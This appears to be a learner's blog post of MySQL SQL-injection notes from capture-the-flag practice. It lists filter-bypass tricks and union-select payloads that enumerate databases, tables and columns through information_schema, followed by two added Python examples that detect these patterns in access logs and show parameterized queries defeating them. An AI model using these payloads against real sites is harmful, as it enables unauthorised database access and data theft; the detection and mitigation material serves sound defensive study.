SQLi

Aryb1n May 19, 2017

I always feel like I just can't do SQLi.
Did an SQLi challenge yesterday and felt like a complete noob.

Spaces are filtered

Use comments: /**/
Use certain %xx bytes, such as %0a, %0d, %0c, %09
Use parentheses; they can only be placed around terms that produce a value

Commas are filtered

at limit => limit 1 offset 4
at union => union select * from (select 1)a join (select 2)b
at mid => mid(user() from 1 for 1)

The column name you want to query is filtered

For example, to read the fourth column, secret => select i.4 from (select 1,2,3,4 union select * from news)i
=> then, since commas are filtered as well, the actual payload is:

 select i.4 from (
     select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d
         union select * from news)i

Showing multiple rows at once

concat()
group_concat()
concat_ws()

Finding the number of columns

order by n
Yesterday I used a really dumb method:

 select count(*) from information_schema.columns where table_schema=database() and table_name='news'

Single quotes are filtered

Use hex literals in place of strings
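From the defender's side, every substitution in the sections above leaves a recognisable trace in the raw request. As an added example (my own code, not part of the original post), here is a small detector that pulls the query string out of access-log lines and flags those traces: encoded whitespace bytes, /**/ used as a space, the comma-free limit/offset and join(select ...) forms, mid(... from ... for ...), hex literals standing in for quoted strings, and information_schema lookups. The indicator names and the log lines are constructed for this example; the encoded-whitespace check runs on the raw string because URL-decoding would turn %09 into an ordinary tab.

```python
import re
from urllib.parse import unquote

# Added example, not from the original post. Indicator names are my own
# labels; each pattern follows one of the substitutions listed in the notes.
COMMENT = re.compile(r"/\*.*?\*/")
RAW_INDICATORS = {
    # %09/%0a/%0c/%0d used as whitespace: checked on the raw query string,
    # because URL-decoding turns them into ordinary tabs and newlines
    "encoded_whitespace": re.compile(r"%0[9acd]", re.IGNORECASE),
}
DECODED_INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    "limit_offset": re.compile(r"\blimit\s+\d+\s+offset\s+\d+", re.IGNORECASE),
    "join_subselect": re.compile(r"\bjoin\s*\(\s*select\b", re.IGNORECASE),
    "mid_from_for": re.compile(r"\bmid\s*\(.*?\bfrom\b.*?\bfor\b", re.IGNORECASE),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]+\b", re.IGNORECASE),
    "information_schema": re.compile(r"\binformation_schema\.", re.IGNORECASE),
}
# request line of a combined-format access log entry
REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_query_string(raw):
    """Return the sorted list of indicator names found in one query string."""
    findings = [name for name, pat in RAW_INDICATORS.items() if pat.search(raw)]
    decoded = unquote(raw)
    if COMMENT.search(decoded):
        findings.append("comment_as_space")
    # treat each /**/ as the space it stands for, so the keyword patterns match
    normalized = COMMENT.sub(" ", decoded)
    findings += [name for name, pat in DECODED_INDICATORS.items() if pat.search(normalized)]
    return sorted(findings)


def scan_log(lines):
    """Return (line number, findings) for every request that trips an indicator."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_PATH.search(line)
        if not m or "?" not in m.group(1):
            continue
        findings = scan_query_string(m.group(1).split("?", 1)[1])
        if findings:
            hits.append((lineno, findings))
    return hits


# Constructed access-log lines (combined format, made up for this example)
SAMPLE_LOG = [
    '10.0.0.5 - - [19/May/2017:10:00:01 +0000] "GET /news.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/May/2017:10:00:02 +0000] "GET /news.php?id=1%09and%091=2%09union%09select%091,2,3,4%09from%09information_schema.tables%09where%09table_schema=0x74657374 HTTP/1.1" 200 498',
    '10.0.0.5 - - [19/May/2017:10:00:03 +0000] "GET /news.php?id=1/**/limit/**/1/**/offset/**/4 HTTP/1.1" 200 510',
    '10.0.0.5 - - [19/May/2017:10:00:04 +0000] "GET /news.php?id=1/**/union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b HTTP/1.1" 200 477',
]

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(lineno, findings)
```

The normal request on the first line produces no findings; the other three are each flagged with the specific substitutions they use, which is more useful for triage than a single "SQLi" verdict. A real deployment would feed the decoder the same normalisation the application applies (double decoding, plus-as-space) so that it sees what the database sees.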

content

 View basic MySQL info

 and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7

 List databases

 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1

 and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata

 List table names

 and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=<hex-encoded database name> limit 1,1

 and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=<hex-encoded database name>

 List columns

 and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=<hex-encoded table name> and table_schema=<hex-encoded database name> limit 1,1

 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=<hex-encoded table name> and table_schema=<hex-encoded database name>
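The lesson behind all of these notes is that a blacklist of spaces, commas and quotes is not a fix, because the grammar offers a substitute for each of them. As an added example (my own code, not the post's), the block below puts a hypothetical blacklist filter next to the actual mitigation. It uses an in-memory SQLite table named news in place of the MySQL target, and a constructed input assembled only from the substitutions already listed in the notes (/**/ for spaces, a join of one-value subselects for the comma-separated column list). The filter leaves that input untouched and the concatenated query returns a row that was never in the table; parameter binding treats the same input as a plain value, and an integer check in front rejects it outright. Identifiers such as an order by column cannot be bound, so they get an allowlist.

```python
import sqlite3

# Added illustration, not the original post's code: a toy "news" table in an
# in-memory SQLite database stands in for the MySQL target of the notes.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO news VALUES (1, 'hello')")
conn.commit()

# Constructed input built only from the substitutions listed in the notes:
# /**/ instead of spaces, a join of single-value subselects instead of a
# comma-separated column list, and no single quotes at all.
PAYLOAD = ("1/**/and/**/1=2/**/union/**/select/**/*/**/from/**/"
           "(select/**/1)a/**/join/**/(select/**/2)b")

ALLOWED_ORDER_COLUMNS = {"id", "title"}   # allowlist for a user-chosen sort column


def blacklist_filter(value):
    """Hypothetical blacklist filter of the kind the notes are working around."""
    for bad in (" ", ",", "'"):
        value = value.replace(bad, "")
    return value


def get_news_blacklist(user_id):
    """Vulnerable: string concatenation guarded only by the blacklist."""
    sql = "SELECT id, title FROM news WHERE id=" + blacklist_filter(user_id)
    return conn.execute(sql).fetchall()


def get_news_bound_string(user_id):
    """Parameter binding alone: the input is compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id, title FROM news WHERE id=?", (user_id,)
    ).fetchall()


def get_news_parameterized(user_id):
    """Hardened: validate the type first, then bind the value as a parameter."""
    id_value = int(user_id)          # raises ValueError for anything non-numeric
    return conn.execute(
        "SELECT id, title FROM news WHERE id=?", (id_value,)
    ).fetchall()


def order_clause(column):
    """Identifiers cannot be bound as parameters, so allowlist them instead."""
    if column not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("unknown sort column")
    return "ORDER BY " + column


if __name__ == "__main__":
    print(blacklist_filter(PAYLOAD) == PAYLOAD)   # True: the filter removes nothing
    print(get_news_blacklist(PAYLOAD))            # [(1, 2)]: a row the table never held
    print(get_news_bound_string(PAYLOAD))         # []: the input is just a non-matching value
    print(get_news_parameterized("1"))            # [(1, 'hello')]
```

The interesting line is the second print: the filter reports nothing wrong, yet the query that reaches the engine is a union with an injected row. That gap between "looks clean to the filter" and "parses as SQL to the database" is the whole reason the checklist above exists, and it closes only when the value is bound rather than concatenated.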

References

https://www.waitalone.cn/mysql-injection-summary.html

Still pretty shaky on blind injection.